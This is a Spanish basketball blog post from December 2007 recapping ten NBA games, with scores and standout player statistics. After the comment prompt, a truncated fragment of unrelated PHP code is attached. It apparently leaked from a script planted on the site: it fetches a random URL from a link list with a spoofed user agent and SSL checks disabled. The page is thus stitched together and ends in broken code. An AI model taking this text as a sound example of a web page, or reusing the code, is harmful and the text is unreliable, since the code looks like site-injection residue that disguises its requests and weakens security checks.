La crónica (12/12/07)

13 de December de 2007 por txusma

Muchísimos partidos ayer por la noche en la NBA y siempre que hay muchos partidos hay muchas cosas que contar: los Raptors derrotaron a los Mavericks y se postulan como favoritos a todo esta temporada, Houston acabó el partido con un 27% de acierto en tiros libres pero aun así consiguió ganar, Orlando perdió el cuarto partido de los últimos 6, esta vez contra los Bucks, Phoenix le ganó a Utah en encuentro con sabor a Playoffs, Seattle ganó el partido del menos malo a New York que sigue hundiéndose en la miseria, los Celtics continúan con paso firme… Todo esto y más, en la crónica:

Mavs 76 – 92 Raptors

Sorpresa relativa en Toronto y es que los Raptors van mejorando partido a partido y engrasando la máquina de cara a una post-temporada en la que estarán seguro. Ayer se aprovecharon de un comienzo muy frío de los de Dallas para poner rápidamente tierra de por medio y llegar al descanso con una diferencia de 18 puntos a su favor. Al contrario que en el anterior partido, en el que Dallas remontó una diferencia de 24 puntos, en éste los Raptors amarrarron el trinfo gracias sobretodo a un Humphries que anotó 16 puntos y cogió 12 rebotes pero sobretodo defendió perfectamente a Nowitzky dejándole en unos míseros 13 puntos. Chris Bosh con 17 puntos y Calderón, titular de nuevo por la lesión de TJ Ford, con 12 puntos y 7 asistencias fueron los otros jugadores destacados de Toronto. Por parte de Dallas tan solo Jason Terry con 21 puntos y Josh Howard con 19 dieron la cara ante un equipo claramente superior.

Wolves 94 – 98 Sixers

Se le escapó por muy poco la victoria a los lobos pero en un tiro de Al Jefferson a falta de 5 segundos que hubiera empatado el partido apareció la figura de Samuel Dalembert, el jugador más destacado del partido. Dalembert cuajó posiblemente la mejor actuación de la temporada con 18 puntos, 11 rebotes y 9 tapones, igualando su récord personal. El partido fue muy igualado en todo momento con constantes alternancias en el marcador: a los triples de Walker (14 puntos) y McCants (15 puntos) contestaban Iguodala (25 puntos y 8 rebotes) y Willie Green (18 puntos), el juego interior de Jefferson (22 puntos y 11 rebotes, décimocuarto doble-doble de esta temporada) era respondido punto por punto por Dalembert y la dirección de juego de Telfair (11 asistencias) encontraba su réplica en Andre Miller (10 puntos y 8 asistencias). De esta se llegó igualado a los minutos finales en los que los Sixers estuvieron mucho más acertados de la mano de Dalmebert e Iguodala. Con este resultado Minnesota continúa siendo el peor equipo de la NBA con un parcial de 3 victorias y 17 derrotas.

Clippers 103 – 108 Bobcats

De nuevo un partido igualado que se resolvió en los minutos finales. Ayer el entrenador de los Bobcats, Sam Vincent, tiró de imaginación y, ante la aciaga noche que estaba viviendo Jason Richardson, decidió jugar muchos minutos con dos bases en pista. Raymond Felton y Jeff McInnis se complementaron a la perfección y abrieron el juego para que por dentro Emeka Okafor y Gerald Wallace pudieran imponer su autoridad. Felton acabó el partido con 26 puntos y 6 asistencias, demostrando una vez más que si él funciona los Bobcats se convierten en un equipo peligroso capaz de ganar a cualquiera. Okafor y Wallace anotaron 25 puntos y el jugador de origen nigeriano capturó además 16 rebotes. Los Clippers, que siguen jugando sin Elton Brand, Sam Cassell y Shaun Livingstone, opusieron resistencia de la mano de Chirs Kaman (17 puntos, 13 rebotes), Corey Maggette (23 puntos) y Tim Thomas (16 puntos). Dickau jugó muchos minutos ante la horrible noche de Brevin Knight e hizo un buen partido, lo que podría darle más minutos en el futuro si la lesión de Cassell se alarga más de lo previsto.

Jazz 98 – 103 Suns

La victoria frente a los Utah Jazz le ha costado a Steve Nash algo más que sudor y esfuerzo: un diente. El base canadiense lideró a su equipo con 29 puntos, 11 asistencias y 6 rebotes, a pesar de perder uno de sus dientes en un choque fortuito con Boozer al disputar un rebote. Junto a él, Shawn Marion ejerció hoy de escudero perfecto al conseguir 26 puntos, 15 rebotes y 5 tapones, para evitar la tercera derrota consecutiva de los de Phoenix. El quinteto de Utah respondió bien a la ofensiva de Phoenix y mantuvo siempre el partido igualado pero no pudo evitar la derrota de su equipo. Destacaron nuevamente Carlos Boozer con 24 puntos y 13 rebotes pero con una relativamente discreta serie de tiro, 12 de 24, y Deron Williams que a los 18 puntos que consiguió le añadió 6 asistencias. Los Jazz, con la baja de Okur por una lesión en el hombro, contaron en el quinteto titular con Millsap, que respondió perfectamente a las espectativas con 20 puntos y 13 rebotes. Kirilenko por su parte remontó la pésima imagen dada en los últimos partidos mostrándose mucho más activo y consiguió 17 puntos.

Warriors 95 – 105 Trail Blazers

El baloncesto es claramente un juego en el que la confianza te puede proporcionar 10 puntos extra, y eso se ha visto esta noche en el Rose Garden de Portland. Los Trail Blazers, un equipo inferior en teoría a los Warriors y más con la baja de Aldridge, uno de sus dos puntales, ha sido capaz de derrotar a unos Warriors enrachados. La clave del partido ha estado en el banquillo de Portland. Los 22 puntos y 8 rebotes de Travis Outlaw más los 21 de James Jones han complementado perfectamente a los 21 puntos, 7 asistencias y 5 rebotes de Brandon Roy. Hoy en la dirección, mejor Jack que Blake. Por parte de los Warriors tan sólo Baron Davis ha conseguido mantener el nivel de pasados partidos con 23 puntos, 11 asistencias y 8 rebotes. Jackson, expulsado del partido faltando casi 4 minutos, se quedó en unos pobres 9 puntos.

Supersonics 117 – 110 Knicks

Duelo por todo lo bajo en el mítico Madison Square Garden, y nueva derrota de los Knicks, que se quedan con 6 victorias y 15 derrotas, empatados en el último puesto de la conferencia Este con Miami Heat. Por su parte los Sonics, liderados por Kevin Durant y Jeff Green, se ponen con 6-17 (sólo los Wolves son peores). Durant anotó 30 puntos, cogió 5 rebotes y dio 4 asistencias, con una buena serie en el tiro, lo cual no es habitual, y Jeff Green salió del banquillo para 17-5-3. Por parte de los de la Gran Manzana destacaron Zach Randolph con 27-16, y Jamaal Crawford con 29 puntos y 6 asistencias. Marbury sigue sin jugar y parece que no lo hará en toda la semana debido a la muerte de su padre.

Kings 78 – 90 Celtics

Los Celtics del Big Three caminan con paso firme incluso con un rookie de titular en el puesto de 5. Glen Davis acabó con 16 puntos y 9 rebotes y se ganó las felicitaciones de sus compañeros y el respeto de sus rivales. El partido estuvo igualado hasta el último cuarto, donde los Celtics apretaron el acelerador en defensa y dejaron a los Kings en 14 puntos. El jugador más destacado del encuentro fue Paul Pierce, con 26 puntos 6 rebotes y 4 asistencias. Por los Kings, 16 puntos de Udrih y Artest y 14 de Brad Miller fueron las actuaciones más destacadas. Los Celtics se ponen con 18 victorias, a sólo 6 de las conseguidas en todo el año pasado.

Pacers 117 – 102 Bulls

Lo que parecía iba a ser un plácido partido para los Bulls, que se habían ido por 9 en el primer cuarto e incrementó su ventaja hasta los 16 en los primeros compases del segundo, cambió radicalmente antes del descanso. Los Pacers se acercaron a 5, Troy Murphy y Tyrus Thomas fueron expulsados y la sangre comenzó a correr por las venas de los de Indiana. Dieron la vuelta al partido antes del descanso, y acabaron el tercer cuarto ganando por 16, y no se dejaron sorprender en el último. Destacables los 22 puntos de Kareem Rush, los 18 y 9 rebotes de Jermaine y los 18 y 8 asistencias de Tinsley. Por los Bulls, 18 puntos con un 30% de acierto para Gordon y los 11 y 8 asistencias para Hinrich. Big Ben Wallace hizo 0 puntos y 6 rebotes en 25 minutos, hecho destacable aunque negativamente.

Magic 86 – 100 Bucks

Gracias a un Michael Redd sobresaliente con 27 puntos, 10 rebotes y 9 asistencias, los Bucks rompieron la dinámica negativa que acumulaban en los últimos partidos y ganaron claramente a los Orlando Magic. Los de Milwaukee salieron más enchufados y en el primer cuarto con un porcentaje de acierto del 68% lograron 12 puntos de ventaja que mantuvieron el resto del partido. Junto a Redd destacaron Mo Williams con 17-6-7 y el chino Yi con 18-7. Orlando ha perdido 4 de los últimos 6 partidos después de haber perdido sólo 3 de los primeros 17, lo que puede considerarse una pequeña crisis de resultados. Ayer Dwight Howard con 20-13, Turkoglu con 18-9 y Lewis con 20 puntos (incluídos 6 triples) fueron los más destacados.

Pistons 77 – 80 Rockets

¿Puede un equipo tener más porcentaje en tiros de campo que en tiros libres? ¿Puede un equipo anotar 6 de 22 tiros libres y ganar? Pues sí que puede, y ése equipo se llama Houston Rockets. En una noche aciaga (tan sólo un 27.3% de acierto en tiros de 1 punto) los jugadores de los Rockets fueron capaces de sobreponerse y acabar ganando un partido que llegó igualado a los segundos finales. T-Mac, con 29 puntos ( y 0 de 5 en tiros libres), y Yao Mig, con 22 puntos y 13 rebotes, fueron los más destacados durante el partido y en los minutos de la verdad. Detroit jugó en general un mal partido y sólo Rashard Wallace, con 21 puntos y 9 rebotes, rayó a buena altura.

 

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>